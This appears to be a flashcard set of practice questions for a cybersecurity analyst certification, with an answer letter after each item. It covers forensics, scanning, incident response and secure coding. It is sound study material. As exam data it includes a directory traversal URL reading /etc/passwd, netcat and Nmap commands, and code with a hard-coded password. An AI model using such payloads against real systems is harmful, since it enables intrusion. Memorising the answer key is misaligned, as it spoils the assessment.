When conducting forensic analysis of a hard drive, what tool would BEST prevent changing the hard drive contents during your analysis? A. Degausser B. Forensic drive duplicator C. Software write blocker D. Hardware write blocker

D

Which of the following does a User-Agent request a resource from when conducting a SAML transaction? A. Relying party (RP) B. Single sign-on (SSO) C. Identity provider (IdP) D. Service provider (SP)

D

Which of the following has occurred if a device fails to activate because it has detected an unknown modification? A. Improper authentication B. Failed trusted foundry C. Obfuscation D. Self-checking

D

Which of the following is NOT a valid reason to conduct reverse engineering? A. To commit industrial espionage B. To allow an attacker to spot vulnerabilities in an executable C. To determine how a piece of malware operates D. To allow the software developer to spot flaws in their source code

D

Which of the following is NOT considered part of the Internet of Things? A. SCADA B. Smart television C. ICS D. Laptop

D

Which of the following is exploited by an SQL injection to give the attacker access to a database? A. Database server B. Firewall C. Operating system D. Web application

D

Which of the following lists represents the NIST cybersecurity framework's four tiers, when ordered from least mature to most mature? A. Partial, Repeatable, Risk Informed, Adaptive B. Partial, Risk Informed, Managed, Adaptive C. Partial, Managed, Risk Informed, Adaptive D. Partial, Risk Informed, Repeatable, Adaptive

D

Which of the following options places the correct phases of the Software Development Lifecycle's waterfall method in the correct order? A. Planning, requirements analysis, design, implementation, deployment, testing, maintenance B. Requirements analysis, planning, design, implementation, testing, deployment, and maintenance C. Requirements analysis, planning, design, implementation, deployment, testing, maintenance D. Planning, requirements analysis, design, implementation, testing, deployment, and maintenance

D

Which of the following scan types are useful for probing firewall rules? A. TCP SYN B. XMAS TREE C. TCP RST D. TCP ACK

D

Which of the following security policies could help detect fraudulent cases that occur even when other security controls are already in place? A. Separation of duties B. Dual control C. Least privilege D. Mandatory vacations

D

Which of the following should a domain administrator utilize to BEST protect their Windows workstations from buffer overflow attacks? A. Conduct bound checking before executing a program B. Install an anti-spyware tool C. Install an anti-malware tool D. Enable DEP in Windows

D

Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host? A. wget B. netcat C. telnet D. ftp

D

Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise? A. Nmap B. traceroute C. regmon D. whois

D

Which of the following vulnerabilities is the greatest threat to data confidentiality? A. phpinfo information disclosure vulnerability B. HTTP TRACE/TRACK methods enabled C. SSL Server with SSLv3 enabled vulnerability D. Web application SQL injection vulnerability

D

Which of the following vulnerability scans would provide the best results if you want to determine if the target's configuration settings are correct? A. External scan B. Non-credentialed scan C. Internal scan D. Credentialed scan

D

Which one of the following methods would provide the most current and accurate information about any vulnerabilities present in a system with a misconfigured operating system setting? A. Scheduled vulnerability scanning B. Continuous vulnerability scanning C. On-demand vulnerability scanning D. Agent-based monitoring

D

Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the operating system can load itself? A. Advanced anti-malware B. Master Boot Record analytics C. Startup Control D. Measured boot

D

Which protective feature is used to prevent a buffer overflow attack from specific applications by randomizing where a program's components are run from in memory? A. DLP B. DLL C. DEP D. ASLR

D

Which security tool is used to facilitate incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment? A. DLP B. SIEM C. MDM D. SOAR

D

While investigating a data breach, you discover that the account credentials used belonged to an employee who was fired several months ago for misusing company IT systems. The IT department never deactivated the employee's account upon their termination. Which of the following categories would this breach be classified as? A. Advanced persistent threat B. Zero-day C. Known threat D. Insider Threat

D

You are a cybersecurity analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is correct? BEGIN OUTPUT # nmap win2k16.local Nmap scan report for win2k16 (192.168.2.15) Host is up (0.132452s latency) Not shown: 997 closed ports PORT STATE SERVICE | 22/tcp open ssh 80/tcp open http # nc win2k16.local 80 220 win2k16.local Dion Training SMTP Server (Postfix/2.4.1) A. Your organization has a vulnerable version of the SSH server software installed B. Your email server has been compromised C. Your web server has been compromised D. Your email server is running on a non-standard port

D

You are attempting to run a packet capture on a Linux workstation using the tcpdump command. Which of the following would allow you to conduct the packet capture and write the output to a file for later analysis? A. tcpdump -i eth0 -n diontraining.pcap B. tcpdump -i eth0 -e diontraining.pcap C. tcpdump -i eth0 -r diontraining.pcap D. tcpdump -i eth0 -w diontraining.pcap

D

You are conducting a review of a VPN device's logs and found the following URL being accessed: https://sslvpn/dana-na/../diontraining/ html5acc/teach/../../../../../../etc/ passwd? /diontraining/html5acc/teach/ Based upon this log entry alone, which of the following most likely occurred? A. The passwd file was downloaded using a directory traversal attack B. An XML injection attack caused the VPN server to return the password file C. A SQL injection attack caused the VPN server to return the password file D. The passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted

D

You are conducting an incident response and want to determine if any account-based indicators of compromise (IoC) exist on a compromised server. Which of the following would you NOT search for on the server? A. Unauthorized sessions B. Off-hours usage C. Failed logins D. Malicious processes

D

You are conducting static analysis of an application's source code and see the following: (String) page += "<type name='id' type='INT' value='" + request.getParameter("ID") + "'>"; Based on this code snippet, which of the following security flaws exists in this application? A. Insufficient logging and monitoring B. Race condition C. Improper error handling D. Improper input validation

D

You are conducting threat hunting on your organization's network. Every workstation on the network uses the same configuration baseline and contains a 500 GB HDD, 4 GB of RAM, and the Windows 10 Enterprise operating system. You know from previous experience that most of the workstations only use 40 GB of space on the hard drives since most users save their files on the file server instead of the local workstation. You discovered one workstation that has over 250 GB of data stored on it. Which of the following is a likely hypothesis of what is happening, and how would you verify it? A. The host might be the victim of a remote access trojan -- you should reimage the machine immediately B. The host might be offline and conducted backups locally -- you should contact a system administrator to have it analyzed C. The host might be used as a command and control node for a botnet -- you should immediately disconnect the host from the network D. The host might use as a staging area for data exfiltration -- you should conduct volume-based trend analysis on the host's storage device

D

You are creating a script to filter some logs so that you can detect any suspected malware beaconing. Which of the following is NOT a typical means of identifying a malware beacon's behavior on the network? A. The beaconing interval B. The removal of known traffic C. The beacon's persistence D. The beacon's protocol

D

You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions? A. Review and enhance patch management policies B. Disable unused user accounts C. Restrict host access to peripheral protocols like USB or Bluetooth D. Proactively sanitize and reimage all of your routers and switches

D

You are investigating a suspected compromise. You have noticed several files that you don't recognize. How can you quickly and effectively check if the files have been infected with malware? A. Run the Strings tool against each file to identify common malware identifiers B. Scan the files using a local anti-virus/anti-malware engine C. Disassemble the files and conduct static analysis on them using IDA Pro D. Submit the files to an open-source intelligence provider like VirusTotal

D

You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? A. \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b B. \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b C. \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b D. \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b

D

You are reviewing the latest list of important web application security controls published by OWASP. Which of these items is LEAST likely to appear on that list? A. Implement appropriate access controls B. Leverage security frameworks and libraries C. Implement identity and authentication controls D. Obscure web interface locations

D

You are reviewing the logs in your HIDS and see that entries were showing SYN packets received from a remote host targeting each port on your web server from 1 to 1024. Which of the following MOST likely occurred? A. UDP probe B. The remote host cannot find the right service port C. SYN flood D. Port scan

D

You are trying to find a rogue device on your wired network. Which of the following options would NOT help find the device? A. Port scanning B. Site surveys C. MAC validation D. War walking

D

You have been asked to provide some training to Dion Training's system administrators about the importance of proper patching of a system before deployment. To demonstrate the effects of deploying a new system without patching it first, you ask the system administrators to provide you with an image of a brand-new server they plan to deploy. How should you deploy the image to demonstrate the vulnerabilities exposed while maintaining the security of the corporate network? A. Deploy the vulnerable image to a virtual machine on a physical server, create an ACL to restrict all incoming connections to the system, then scan it for vulnerabilities B. Deploy the image to a brand new physical server, connect it to the corporate network, then conduct a vulnerability scan to demonstrate how many vulnerabilities are now on the network C. Utilize a server with multiple virtual machine snapshots installed o it, restore from a known compromised image, then scan it for vulnerabilities D. Deploy the system image within a virtual machine, ensure it is in an isolated sandbox environment, then scan it for vulnerabilities

D

You have been hired as a cybersecurity analyst for a privately-owned bank. Which of the following regulations would have the greatest impact on your bank's cybersecurity program? A. FERPA B. SOX C. HIPAA D. GLBA

D

You have been hired to investigate a possible insider threat from a user named Terri. Which command would you use to review all sudo commands ever issued by Terri (whose login account is terri and UID=1003) on a Linux system? (Select the MOST efficient command) A. journalctl _UID=1003 | grep -e [Tt]erri | grep -e 1003 | grep sudo B. journalctl _UID=1003 | grep -e 1003 | grep sudo C. journalctl _UID=1003 | grep -e [Tt]erri | grep sudo D. journalctl _UID=1003 | grep sudo

D

You have been hired to investigate a possible insider threat from a user named Terri. Which of the following commands would successfully look through all the log files in "/var/log" for any references to "Terri" or "terri" on a Linux server? A. find /var/log/ -exec grep -H -e "'terri' OR 'Terri'" {} \; 2> /dev/null B. find /var/log/ -name "*.log" -exec grep -H -e "[Tt]erri" {} \; 2>/dev/null C. find /var/log/ -name *.log -exec grep -H -e "'Terri' OR 'terri'" {} \; 2>/dev/null D. find /var/log/ -exec grep -H -e "[Tt]erri" {} \; 2> /dev/null

D

You have been investigating how a malicious actor could exfiltrate confidential data from a web server to a remote host. After an in-depth forensic review, you determine that a rootkit's installation had modified the web server's BIOS. After removing the rootkit and reflashing the BIOS to a known good image, what should you do to prevent the malicious actor from affecting the BIOS again? A. Utilize file integrity monitoring B. Install an anti-malware application C. Install a host-based IDS D. Utilize secure boot

D

You have just finished running a Nmap scan on a server are see the following output: # nmap diontraining.com Starting Nmap ( http://nmap.org) Nmap scan report for diontraining.com (64.13.134.52) Not shown: 996 filtered ports PORT STATE 22/tcp open 23/tcp open 53/tcp open 443/tcp open Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds Based on the output above, which of the following ports listed as open represents the most significant security vulnerability to your network? A. 53 B. 22 C. 443 D. 23

D

You have just received some unusual alerts on your SIEM dashboard and want to collect the payload associated with it. Which of the following should you implement to effectively collect these malicious payloads that the attackers are sending towards your systems without impacting your organization's normal business operations? A. Jumpbox B. Sandbox C. Containerization D. Honeypot

D

You have run a vulnerability scan and received the following output: CVE-2011-3389 QID 42366 - SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: openssl s_client -connect login.diontraining.com:443 - tls -cipher "AES:CAMELLISA:SEED: 3DES:DES" Which of the following categories should this be classified as? A. Active Directory encryption vulnerability B. VPN tunnel vulnerability C. PKI transfer vulnerability D. Web application cryptography vulnerability

D

You just finished conducting a remote scan of a class C network block using the following command "nmap -sS 202.15.73.0/24". The results only showed a single web server. Which of the following techniques would allow you to gather additional information about the network? A. Use a UDP scan B. Scan using the -p 1-65535 flag C. Use an IPS evasion technique D. Perform a scan from on-site

D

You want to provide controlled remote access to the remote administration interfaces of multiple servers hosted on a private cloud. What type of segmentation security solution is the best choice for this scenario? A. Bastion hosts B. Physical C. Airgap D. Jumpbox

D

You work as a cybersecurity analyst at a software development firm. The software developers have begun implementing commercial and open source libraries into their codebase to minimize the time it takes to develop and release a new application. Which of the following should be your biggest concern as a cybersecurity analyst? A. There are no concerns with using commercial or open-source libraries to speed up developments B. Whether or not the libraries being used in the projects are the most up to date versions C. Open-source libraries are inherently insecure because you do not know who wrote them D. Any security flaws present in the library will also be present in the developed application

D

Your company has been contracted to develop an Android mobile application for a major bank. You have been asked to verify the security of the Java function's source code below: int verifyAdmin(String password) { if (password.equals("mR7HCS14@31&#")) { return 0; return 1; } Which of the following vulnerabilities exist in this application's authentication function based solely on the source code provided? A. The function is using parameterized queries B. The function is vulnerable to a buffer overflow attack C. The function is vulnerable to an SQL injection attack D. The function is using hard-coded credentials to verify the password entered by the user

D

Your company has just finished replacing all of its computers with brand new workstations. Colleen, one of your coworkers, has asked the company's owner if she can have the old computers that are about to be thrown away. Colleen would like to refurbish the old computers by reinstalling a new operating system and donating them to a local community center for disadvantaged children in the neighborhood. The owner thinks this is a great idea but is concerned that the private and sensitive corporate data on the old computer's hard drives might be placed at risk of exposure. You have been asked to choose the best solution to sanitize or destroy the data while ensuring the computers will still be usable by the community center. What type of data destruction or sanitization method do you recommend? A. Purging B. Shredding C. Degaussing D. Wiping

D

Your company is adopting a new BYOD policy for tablets and smartphones. Which of the following would allow the company to secure the sensitive information on personally owned devices and the ability to remote wipe corporate information without the user's affecting personal data? A. Long and complex passwords B. Touch ID C. Face ID D. Containerization

D

Your organization has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. Before this migration, a weekly port scan was conducted to help validate the on-premise systems' security. Which of the following actions should you take to validate the security of the cloud-based solution? A. Utilize a different scanning tool B. Utilize a third-party contractor to conduct the scans C. Utilize a VPN to scan inside the vendor's security perimeter D. Utilize vendor testing and audits

D

Your organization has recently suffered a data breach due to a server being exploited. As a part of the remediation efforts, the company wants to ensure that the default administrator password on each of the 1250 workstations on the network is changed. What is the easiest way to perform this password change requirement? A. Create a new security group B. Revoke the digital certificate C. Utilize the key escrow process D. Deploy a new group policy

D

Which of the following functions is NOT provided by a TPM? A. Random number generation B. Secure generation of cryptographic keys C. Sealing D. Remote attestation E. Binding F. User authentication

F


Related study sets

Africa South of the Sahara - Climate and Vegetation

View Set

Gross Domestic Product and Growth

View Set

E-3.14 - 3.16 Facilitating Continuity of Services, Appropriately Discontinuing & Transitioning Services

View Set

History of Computers (Computer Science)

View Set

Ap Euro Unit 4a Key Terms and People

View Set

Ryan Keaton chapter 1 accounting ethics

View Set